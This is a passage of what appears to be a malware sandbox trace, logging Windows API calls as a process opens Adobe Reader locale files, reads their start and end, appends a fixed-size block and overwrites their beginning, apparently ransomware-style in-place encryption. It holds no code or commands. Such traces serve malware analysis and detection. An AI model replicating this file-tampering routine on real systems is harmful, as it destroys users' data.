lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0076.202] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.202] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1f600 [0076.202] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.203] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.203] ReleaseMutex (hMutex=0x168) returned 1 [0076.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.HUN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.HUN", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.HUN", lpUsedDefaultChar=0x0) returned 12 [0076.203] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.205] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1e600 [0076.206] ReadFile (in: hFile=0x1fc, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.206] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1e600 [0076.207] WriteFile (in: hFile=0x1fc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.207] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0076.207] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.207] CloseHandle (hObject=0x1fc) returned 1 [0076.207] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\pddom.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\pddom.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0076.208] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.208] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2c00 [0076.208] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.208] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.208] ReleaseMutex (hMutex=0x168) returned 1 [0076.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.HUN", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0076.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.HUN", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.HUN", lpUsedDefaultChar=0x0) returned 9 [0076.208] ReadFile (in: hFile=0x1fc, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.562] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1c00 [0076.563] ReadFile (in: hFile=0x1fc, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.563] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1c00 [0076.563] WriteFile (in: hFile=0x1fc, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.564] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0076.564] WriteFile (in: hFile=0x1fc, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.564] CloseHandle (hObject=0x1fc) returned 1 [0076.565] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0076.953] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.953] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x9598 [0076.954] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.954] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.954] ReleaseMutex (hMutex=0x168) returned 1 [0076.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0076.954] ReadFile (in: hFile=0x204, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.957] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x8598 [0076.957] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.962] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x8598 [0076.962] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.962] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0076.963] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.963] CloseHandle (hObject=0x204) returned 1 [0076.963] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Annots.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\annots.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0076.965] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.965] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7c600 [0076.965] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.965] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.966] ReleaseMutex (hMutex=0x168) returned 1 [0076.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.ITA", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.ITA", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.ITA", lpUsedDefaultChar=0x0) returned 10 [0076.966] ReadFile (in: hFile=0x204, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0076.969] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7b600 [0076.969] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.972] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7b600 [0076.972] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.973] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0076.973] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0076.973] CloseHandle (hObject=0x204) returned 1 [0076.973] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\makeaccessible.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\makeaccessible.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0076.975] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.975] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x14400 [0076.975] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.975] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.975] ReleaseMutex (hMutex=0x168) returned 1 [0076.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.ITA", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0076.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.ITA", cchWideChar=18, lpMultiByteStr=0x1f88ba4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.ITA", lpUsedDefaultChar=0x0) returned 18 [0076.975] ReadFile (in: hFile=0x204, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.978] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x13400 [0076.979] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.979] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x13400 [0076.980] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.980] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0076.980] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.980] CloseHandle (hObject=0x204) returned 1 [0076.981] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Search.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\search.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0076.982] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.982] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6200 [0076.982] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.982] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.982] ReleaseMutex (hMutex=0x168) returned 1 [0076.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.ITA", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.ITA", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.ITA", lpUsedDefaultChar=0x0) returned 10 [0076.983] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.986] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5200 [0076.986] ReadFile (in: hFile=0x204, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.986] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5200 [0076.987] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.987] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0076.987] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.987] CloseHandle (hObject=0x204) returned 1 [0076.988] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Acroform.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\acroform.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0076.989] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.989] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x48c00 [0076.989] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.989] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.989] ReleaseMutex (hMutex=0x168) returned 1 [0076.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.JPN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.JPN", cchWideChar=12, lpMultiByteStr=0x1f7362c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.JPN", lpUsedDefaultChar=0x0) returned 12 [0076.989] ReadFile (in: hFile=0x204, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0076.992] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x47c00 [0076.992] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.994] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x47c00 [0076.995] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.996] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0076.996] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0076.997] CloseHandle (hObject=0x204) returned 1 [0076.997] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\EScript.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\escript.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0076.998] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.998] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x8000 [0076.998] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.998] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.998] ReleaseMutex (hMutex=0x168) returned 1 [0076.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.JPN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.JPN", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.JPN", lpUsedDefaultChar=0x0) returned 11 [0076.999] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.001] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7000 [0077.001] ReadFile (in: hFile=0x204, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.002] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7000 [0077.002] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, 